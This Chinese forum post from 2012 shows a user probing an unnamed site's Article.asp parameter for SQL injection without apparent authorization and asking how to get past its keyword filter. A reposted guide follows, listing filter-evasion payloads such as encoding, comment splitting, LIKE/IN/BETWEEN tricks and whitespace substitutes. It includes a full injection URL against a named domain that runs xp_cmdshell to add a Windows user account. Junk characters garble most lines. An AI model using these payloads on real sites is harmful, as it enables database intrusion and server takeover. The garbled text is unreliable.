路过这个网站,检测了一下.
0 D( G% l/ J2 `4 V8 I- `http://www.xxx.cn/Article.asp?ID=117 and 1=1
4 _, f' v0 T" d: q: w: h8 V直接返回主页
4 i9 @- D; J# g5 a) P% Rhttp://www.xxx.cn/Article.asp?ID=117 or 1=1% C0 K7 O; X; O5 M- Q" l' v
直接返回主页5 i" Q% d/ v- G8 V- @
http://www.xxx.cn/Article.asp?ID=117 or5 F4 @; v6 r! f# [2 W5 b0 r
没有返回主页 没有过滤or% r ], }/ J6 e8 j, x* |
http://www.xxx.cn/Article.asp?ID=117 and/ D: z4 b4 I8 P$ e( _1 Q
直接返回主页 看来过滤了and
; `; l; ~! s. ahttp://www.xxx.cn/Article.asp?ID=117 or 1
3 y: \6 P- P5 y# d没有返回主页 即没有过滤or 也没有过滤12 `8 X3 i! w" n0 c
http://www.xxx.cn/Article.asp?ID=117 or 1=16 c, c' z. k8 q
直接返回主页 很明显过滤了等号 3 E" `$ m( T! ~: S
or的特性是与and相反的.
/ T* h7 ^, w7 @6 q1 L* ?or 1=1 爆错 或与原页面不同7 U+ _( n$ b b; M$ y4 ^# g/ w
or 1=2 原页面相同& _& D2 X& | {( B
这样就是一个注入点
: d$ r6 ]+ o: z( G$ E6 R但他过滤了=号 我就用><号代替=号吧!
8 F! d. |+ z% |8 Lor 1<2 很明显是正确的,所以应该与原页面不同' e2 E0 R# x7 ]. u" w
or 1>2 很明显是错误的,所以应该与原页面相同. k7 ~9 e: }8 k) x
然后看看有没有过滤其他的查询语句,比如select.
* i3 M2 @! T0 B/ p5 \http://www.xxx.cn/Article.asp?ID=117 select+ X R& o1 |5 o# g
直接返回主页8 D4 S% Q. \$ Z- e ?' ~# H
又迷茫了..
* C7 H! Y4 u: I7 a, n$ {. t {5 l4 B1 _* ^% `: m/ `
8 u/ ^! }* ?. P5 ^. O( A1 g
cookies注入.和以下的方法全都试过了,都失败了.还有什么方法可以饶过吗
# s& o# X+ A, P* S0 J这个系统我以为是my动力,后台却是这样的http://www.xxx.cn/admin.asp(应该不是假够台吧)5 ^( ?9 P" K1 Y* q0 E; D
================================================/ j. W9 Z' ` A5 g# A8 ]
以下是转贴:
# [: \3 H; T: E2 X9 f/ ~" O: W" @( P" ~ A- h, K
突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“’”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好……
h1 v3 G; t. [7 s5 h经过我的收集,大部分的防注入程序都过滤了以下关键字:
0 X: {" \1 v2 l, tand | select | update | chr | delete | %20from | ; | insert | mid | master. | set | = 4 Z+ l3 {: ^( `2 @
而这里最难处理的就是select这个关键字了,那么我们怎样来突破他们呢?问题虽未完全解决,但还是说出来与大家分享一下,希望能抛砖引玉。 2 z/ b* n _2 Q# I% L
对于关键字的过滤,以下是我收集的以及我个人的一些想法。 8 G7 i* I$ w7 ~
1、运用编码技术绕过 . A7 o" {: ^) s
如URLEncode编码,ASCII编码绕过。例如or 1=1即
. K6 [& t; f7 s8 j z%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。
6 m- K7 M% T( W. y+ p3 y, V/ @
9 ?/ n) d* D/ u/ S- X( f2、通过空格绕过 + t& R$ e& M/ I9 [2 i3 f
如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如
' I* j* l& Z: M4 y3 _2 r. M1 Wor’ swords’ =‘swords’
7 A' L- n" {6 l9 [,由于mssql的松散性,我们可以把or ’swords’ 之间的空格去掉,并不影响运行。
4 ], h: ?1 M: h3、运用字符串判断代替
3 ` Q6 u6 H) F( g* t$ D; f用经典的or 1=1判断绕过,如
. P, e. x/ ~ b6 S% O3 @or ’swords’ =’swords’
' h% O# l8 R' \0 a,这个方法就是网上在讨论的。 # Y. O' C0 _# s0 f. b, W& q
4、通过类型转换修饰符N绕过
& F4 C2 F* q! A$ b可以说这是一个不错的想法,他除了能在某种程度上绕过限制,而且还有别的作用,大家自己好好想想吧。关于利用,如or ’swords’ = N’ swords’ ,大写的N告诉mssql server 字符串作为nvarchar类型,它起到类型转换的作用,并不影响注射语句本身,但是可以避过基于知识的模式匹配IDS。
$ |# g ] Z) f$ ]9 ? W @/ V5、通过+号拆解字符串绕过
# T& g. X$ D# E* m! }* [效果值得考证,但毕竟是一种方法。如
3 n# W( j! p2 T9 a/ b7 Tor ’swords’ =‘sw’ +’ ords’ ;EXEC(‘IN’ +’ SERT INTO ’+’ …..’ ) 0 O: T W; C! I9 q% z! T) M
: ~" u: H- ^. T. W4 ` _
6、通过LIKE绕过
: x: Q: f, Y4 a' i& @/ Z: r以前怎么就没想到呢?如or
' c- E7 n) O4 j% t" \; m6 P6 I’swords’ LIKE ’sw’ , v7 Y; g# B2 I# x' a3 [
!!!显然可以很轻松的绕过 A/ `. V+ ^! O) F' m4 O; \/ K
“=”“>”
i' U7 d* g/ K3 F4 R$ b# j+ T的限制…… & \3 T O9 {# k6 B
7、通过IN绕过 1 \7 l# |( d6 a" k& o* x7 c7 s
与上面的LIKE的思路差不多,如
k1 b8 d1 ]$ T7 m* o: d& F% C5 hor ’swords’ IN (’swords’) 5 o$ [7 o+ W: Q, L' ^# G8 v
8 N/ H# U' C6 S3 `8、通过BETWEEN绕过
, K# w! F, T" i9 ~如 * i7 R7 u/ C- W
or ’swords’ BETWEEN ’rw’ AND ’tw’ . u1 k( Z% @; ~9 E0 ?! W! X
6 y" }9 f, v+ }3 u
9、通过>或者<绕过
0 H$ ?3 {# e+ S- q) I& W( Ior ’swords’ > ’sw’
4 m& v9 p+ _/ l6 bor ’swords’ < ’tw’ - N, y" h: U$ ] F
or 1<3
# Q, A) B- q; L" z# R" |- y……
) v) {' [/ C! ?) v: T8 ~2 [10、运用注释语句绕过 7 R/ n; @! Y0 z' z& @
用/**/代替空格,如: 2 J- T/ ^- l# I' V0 s
UNION /**/ Select /**/user,pwd,from tbluser
) j+ o4 \* o% } ^. n
& O2 N N7 s1 q: D( Q用/**/分割敏感词,如: ! ~6 J1 e+ {6 G; ]9 A
U/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser
. y) b1 B5 t4 _- U q2 ^6 m, Y+ ]
11、用HEX绕过,一般的IDS都无法检测出来 2 \& P1 n7 G/ c8 a0 C- j7 Z. x
0x730079007300610064006D0069006E00 =hex(sysadmin)
5 ]! }9 p8 L+ |9 S) J. m" \4 ^3 I0x640062005F006F0077006E0065007200 =hex(db_owner) ; m/ p% b( r g! z
另外,关于通用点的过滤方法,我们可以考虑采用赋值的方法,例如先声明一个变量a,然后把我们的指令赋值给a,然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下:
8 k) p) U/ Y. r; [# R declare @a sysname
: A, |3 b1 K% L. n6 e select @a=
& c+ A$ p- R* z$ P; E exec master.dbo.xp_cmdshell @a
! p! `' |- {! \$ Q效果
$ M( g: r! Q3 H7 U7 F2 I9 lhttp://www.ilikeplmm.com/show.asp?id=1;declare%20@a% [email=20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a]20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a[/email];--
4 R3 R2 A$ N+ m8 J+ n
( J( z5 ^9 J4 }! I' g其中的
1 M1 N/ B$ D2 d7 d0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400 2 ]9 u+ D0 `7 _ W6 E% q4 C
就是
" Y+ X8 i' B, m2 \, R w1 x“net user angel pass /add”/ `; v& |" A" P' G! `) d
4 T3 R& p0 C( `5 K4 v
一直以来都以为只有空格,tab键和注释符/**/可以用来切割sql关键字,段时间在邪八看了风迅cms注入漏洞那篇帖子,才知道原来回车也可以用来作为分割符(以前竟然没有想到,真是失败)。回车的ascii码是chr(13)&chr(10),至于为什么要两个连在一起,这个我也不知道。转换成url编码形式是%0d%0a,于是就可以用%0d%0a代替空格pass一些过滤空格的检查了。
# J5 M6 w# o2 h/ w+ N$ T4 O9 g( f引申一下,只用%0d能正常执行语句吗?只用%0a呢?测试证明,用任意一种分割在mssql、mysql和access里面都是可以的。+ L" M5 w) ?1 B7 C
另外,关于mssql的多语句问题。我以前一直以为必须用分号作为语句的结尾,后来发现,完全不是那样。类似
: |$ r4 s3 A8 a6 g, g5 TCopy code$ U0 r# a, L- b6 Y0 N0 g% Q9 w2 Y! G# P
select * from table exec xp_cmdshell'xxxxxxxxxx'
8 y. _- c- r) m! s0 a! M& D- p2 W1 l, b' R W: ~
- `' e1 G* y# X% P2 S+ H2 l$ Y3 nselect * from table/**/exec xp_cmdshell'xxxxxxxxxx'& R. R/ t" L. U1 }. p. a8 Y
; x8 M, _; w$ t
5 F8 c0 H4 a- a* i+ Lselect * from table|---tab---|exec xp_cmdshell'xxxxxxxxxx'! ~& ?/ K, K7 n( D; y; d/ d- t
l3 l! S% X, v% \# g
5 s" D) b: r2 }: V/ q$ Nselect * from table|---enter---|exec xp_cmdshell'xxxxxxxxxx'
- T- R! f! v3 i
- ]& i* P2 g; D8 J9 u" g的语句都是可以正常执行的。而我以前竟然一直不知道!不过这个貌似跟连接数据库驱动有关系,odbc可以正常执行,sqloledb的话就会报错。有兴趣的继续研究吧?
8 v( j/ K- G5 S% @3 I1 h9 e- Y" @; e$ K4 T ]9 t
这样,以后遇到带空格过滤关键字的拦截程序,又可以发挥发挥了
6 K7 T/ k9 S% V5 v可能大家早就知道了,不管怎么说,发在这里吧!
; x/ F2 @, a8 r
3 n% A7 T6 j& w最近想起可能还有些ascii码可以用来在sql语句中代替空格,于是写个脚本测试了一下,结果在所有128个低位ascii字符中,chr(12)也可以在access里用,不过貌似chr(12)不能出现在and、or之类的关键词附近,原因不清楚。mysql中比access多一个chr(11)可以。至于mssql,挖日,直接从1到32的ascii码换成字符后都可以正常使用。- ^* P7 y0 f M2 r1 t
; B/ T! `! M1 U, Q- g. Z, ~, \( r# m( F8 q1 k/ D6 k, g
, z. f" t$ P+ ^2 n! l) w% i# f
对于中间应该出现空格的地方,用()进行替换,不过,对于很复杂的SQL语句就不太好用了。上面说到的是字符型的,如果是数值型,可以在id=1后加一个括号,不过这个我没有测试,
4 ]3 |& [" p8 _% N4 w' M2 G0 r比如:jmdcw.asp?id=(1)and(select.....),应该是可行的吧? ( N4 r- r- d! D1 F& v
( u9 X$ K# l6 e |
发表于 2012-9-15 14:47:46
收藏
支持
反对